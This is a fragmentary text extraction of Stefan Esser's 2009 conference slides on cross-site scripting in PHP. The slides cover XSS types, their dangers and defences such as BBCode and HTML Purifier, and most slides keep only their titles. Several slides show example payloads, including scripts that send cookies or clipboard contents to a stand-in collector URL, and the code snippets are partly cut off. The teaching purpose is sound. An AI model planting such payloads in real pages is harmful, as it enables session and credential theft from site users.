Professional Documents
Culture Documents
PHP Security Crash Course - 2 - XSS
PHP Security Crash Course - 2 - XSS
Stefan Esser • PHP Security Crash Course at Dutch PHP Conference 2009 • June 2009 • 1
What is Cross Site Scripting (XSS) (I)
Stefan Esser • PHP Security Crash Course at Dutch PHP Conference 2009 • June 2009 • 2
What is Cross Site Scripting (XSS) (II)
Stefan Esser • PHP Security Crash Course at Dutch PHP Conference 2009 • June 2009 • 3
What is Cross Site Scripting (XSS) (II)
Stefan Esser • PHP Security Crash Course at Dutch PHP Conference 2009 • June 2009 • 4
What is Cross Site Scripting (XSS) (III)
Stefan Esser • PHP Security Crash Course at Dutch PHP Conference 2009 • June 2009 • 5
What is Cross Site Scripting (XSS) (IV)
Stefan Esser • PHP Security Crash Course at Dutch PHP Conference 2009 • June 2009 • 6
Cross Site Scripting (XSS) Typs
Stefan Esser • PHP Security Crash Course at Dutch PHP Conference 2009 • June 2009 • 7
Reflective XSS
Stefan Esser • PHP Security Crash Course at Dutch PHP Conference 2009 • June 2009 • 8
Persistent XSS (I)
Stefan Esser • PHP Security Crash Course at Dutch PHP Conference 2009 • June 2009 • 9
Persistent XSS (II)
Stefan Esser • PHP Security Crash Course at Dutch PHP Conference 2009 • June 2009 • 10
DOM based XSS
Stefan Esser • PHP Security Crash Course at Dutch PHP Conference 2009 • June 2009 • 11
XSS Dangers
• displaying popups
• redirect (e.g. malware)
• modification of text and images (defacement)
• manipulation of client side application logic
• theft of clipboard, cookies, passwords, ...
• XSS traverses firewalls - browser remote control
Stefan Esser • PHP Security Crash Course at Dutch PHP Conference 2009 • June 2009 • 12
XSS: displaying popups
<script>
alert(“XSS problem“);
</script>
Stefan Esser • PHP Security Crash Course at Dutch PHP Conference 2009 • June 2009 • 13
XSS: Redirection
<script>
document.location = “http://www.example.com/malware“;
</script>
Stefan Esser • PHP Security Crash Course at Dutch PHP Conference 2009 • June 2009 • 14
XSS: Manipulation of Text and Images
<script>
tags = “<img src=‘http://example.com/ruecktritt.jpg‘ />“;
tags = tags + “<a href=‘http://example.com/malware‘>“;
tags = tags + “Download full report</a>“;
document.write(tags);
</script>
Stefan Esser • PHP Security Crash Course at Dutch PHP Conference 2009 • June 2009 • 15
XSS: Cookie Theft
<script>
tags = “<img src=‘http://example.com/collect.php?data=“;
tags = tags + escape(document.cookie) + “‘>“;
document.write(tags);
</script>
Stefan Esser • PHP Security Crash Course at Dutch PHP Conference 2009 • June 2009 • 16
XSS: Clipboard Theft
<script>
myClipboard = clipboardData.getData(“Text“);
tags = “<img src=‘http://example.com/collect.php?data=“;
tags = tags + escape(myClipboard) + “‘>“;
document.write(tags);
</script>
Stefan Esser • PHP Security Crash Course at Dutch PHP Conference 2009 • June 2009 • 17
XSS: Theft of sensitive Data
Stefan Esser • PHP Security Crash Course at Dutch PHP Conference 2009 • June 2009 • 18
XSS: Theft of Passwords (I)
Stefan Esser • PHP Security Crash Course at Dutch PHP Conference 2009 • June 2009 • 19
XSS: Theft of Passwords (II)
XSS Payload
• creates an IFRAME containing the login
• waits until Firefox fills in the login data
• reads login data
• and sends it to the attacker
Stefan Esser • PHP Security Crash Course at Dutch PHP Conference 2009 • June 2009 • 20
XSS: Theft of Passwords (III)
</form>
Stefan Esser • PHP Security Crash Course at Dutch PHP Conference 2009 • June 2009 • 21
XSS: Theft of Passwords (IV)
$key = $_POST[‘key‘];
$user = $_POST[‘user‘][$key];
$pass = $_POST[‘password‘][$key];
?>
Stefan Esser • PHP Security Crash Course at Dutch PHP Conference 2009 • June 2009 • 22
XSS: Manipulating client-side application logic (I)
Stefan Esser • PHP Security Crash Course at Dutch PHP Conference 2009 • June 2009 • 23
XSS: Manipulating client-side application logic (II)
Stefan Esser • PHP Security Crash Course at Dutch PHP Conference 2009 • June 2009 • 24
XSS: Manipulating client-side application logic (III)
Stefan Esser • PHP Security Crash Course at Dutch PHP Conference 2009 • June 2009 • 25
XSS: Firewall Bypass (I)
Stefan Esser • PHP Security Crash Course at Dutch PHP Conference 2009 • June 2009 • 26
XSS: Firewall Bypass (II)
Stefan Esser • PHP Security Crash Course at Dutch PHP Conference 2009 • June 2009 • 27
XSS: Firewall Bypass (III)
Stefan Esser • PHP Security Crash Course at Dutch PHP Conference 2009 • June 2009 • 28
Different HTML contexts
Stefan Esser • PHP Security Crash Course at Dutch PHP Conference 2009 • June 2009 • 29
XSS: Injection outside of HTML Tags (I)
Stefan Esser • PHP Security Crash Course at Dutch PHP Conference 2009 • June 2009 • 30
XSS: Injection outside of HTML Tags (II)
Stefan Esser • PHP Security Crash Course at Dutch PHP Conference 2009 • June 2009 • 31
XSS: Injection outside of HTML Tags (III)
Stefan Esser • PHP Security Crash Course at Dutch PHP Conference 2009 • June 2009 • 32
XSS: Injection outside of HTML Tags (IV)
Stefan Esser • PHP Security Crash Course at Dutch PHP Conference 2009 • June 2009 • 33
XSS: Injection within HTML Tags (I)
Stefan Esser • PHP Security Crash Course at Dutch PHP Conference 2009 • June 2009 • 34
XSS: Injection within HTML Tags (II)
Stefan Esser • PHP Security Crash Course at Dutch PHP Conference 2009 • June 2009 • 35
XSS: Injection within HTML Tags (III)
Stefan Esser • PHP Security Crash Course at Dutch PHP Conference 2009 • June 2009 • 36
XSS: Injection within URL Attributes (I)
Stefan Esser • PHP Security Crash Course at Dutch PHP Conference 2009 • June 2009 • 37
XSS: Injection within URL Attributes (II)
Stefan Esser • PHP Security Crash Course at Dutch PHP Conference 2009 • June 2009 • 38
XSS: Injection within URL Attributes (III)
<?php
$url_a = $_GET[‘a‘];
$url_b = $_GET[‘b‘];
Stefan Esser • PHP Security Crash Course at Dutch PHP Conference 2009 • June 2009 • 39
XSS: Injection in Stylesheet Attributes/Tags (I)
Stefan Esser • PHP Security Crash Course at Dutch PHP Conference 2009 • June 2009 • 40
XSS: Injection in Stylesheet Attributes/Tags (II)
Stefan Esser • PHP Security Crash Course at Dutch PHP Conference 2009 • June 2009 • 41
XSS: Injection in JavaScript/JavaScript Strings (I)
Stefan Esser • PHP Security Crash Course at Dutch PHP Conference 2009 • June 2009 • 42
XSS: Injection in JavaScript/JavaScript Strings (II)
Stefan Esser • PHP Security Crash Course at Dutch PHP Conference 2009 • June 2009 • 43
XSS and Character Encoding (I)
Stefan Esser • PHP Security Crash Course at Dutch PHP Conference 2009 • June 2009 • 44
XSS and Character Encoding (II) - UTF-7 Attack
Stefan Esser • PHP Security Crash Course at Dutch PHP Conference 2009 • June 2009 • 45
XSS and Character Encoding (III) - UTF-7 Attack
Stefan Esser • PHP Security Crash Course at Dutch PHP Conference 2009 • June 2009 • 46
Allowing HTML but disallowing XSS (I)
Stefan Esser • PHP Security Crash Course at Dutch PHP Conference 2009 • June 2009 • 47
Allowing HTML but disallowing XSS (II)
Stefan Esser • PHP Security Crash Course at Dutch PHP Conference 2009 • June 2009 • 48
Allowing HTML but disallowing XSS (III)
Working approaches
• BBCode
• Blacklisting HTML filter
• Whitelisting HTML filter
Stefan Esser • PHP Security Crash Course at Dutch PHP Conference 2009 • June 2009 • 49
BBCode
• Pseudo Markup
• tags similar to HTML
• [ ] instead of < >
• easier to learn than HTML
• will be converted to HTML during output
Stefan Esser • PHP Security Crash Course at Dutch PHP Conference 2009 • June 2009 • 50
BBCode - PEAR HTML_BBCodeParser (I)
<?php
require_once(“HTML/BBCodeParser.php“);
echo $parser->getParsed();
?>
Stefan Esser • PHP Security Crash Course at Dutch PHP Conference 2009 • June 2009 • 51
BBCode - PEAR HTML_BBCodeParser (II)
• BBCode
This String is [b]bold[/b] and [u]underlined[/u]
and [i]italic[/i]
• XHTML
This String is <strong>bold</strong> and
<u>underlined</u> and <em>italic</em>
Stefan Esser • PHP Security Crash Course at Dutch PHP Conference 2009 • June 2009 • 52
Blacklisting HTML Filter
Stefan Esser • PHP Security Crash Course at Dutch PHP Conference 2009 • June 2009 • 53
Blacklisting HTML Filter - safehtml
Stefan Esser • PHP Security Crash Course at Dutch PHP Conference 2009 • June 2009 • 54
Blacklisting HTML Filter - safehtml
<?php
define(“XML_HTMLSax3“, “/usr/local/lib/php/XML/“);
require_once(“safehtml/classes/safehtml.php“);
echo $parser->parse($_POST[“message“]);
?>
Stefan Esser • PHP Security Crash Course at Dutch PHP Conference 2009 • June 2009 • 55
Whitelisting HTML Filter
Stefan Esser • PHP Security Crash Course at Dutch PHP Conference 2009 • June 2009 • 56
Whitelisting HTML Filter - HTML Purifier
<?php
require_once(“HTMLPurifier.auto.php“);
$config = HTMLPurifier_Config::createDefault();
$config->set(‘URI‘, ‘HostBlacklist‘, array(‘google.com‘));
echo $purifier->purify($_POST[“message“]);
?>
Stefan Esser • PHP Security Crash Course at Dutch PHP Conference 2009 • June 2009 • 57
Questions ?
Stefan Esser • PHP Security Crash Course at Dutch PHP Conference 2009 • June 2009 • 58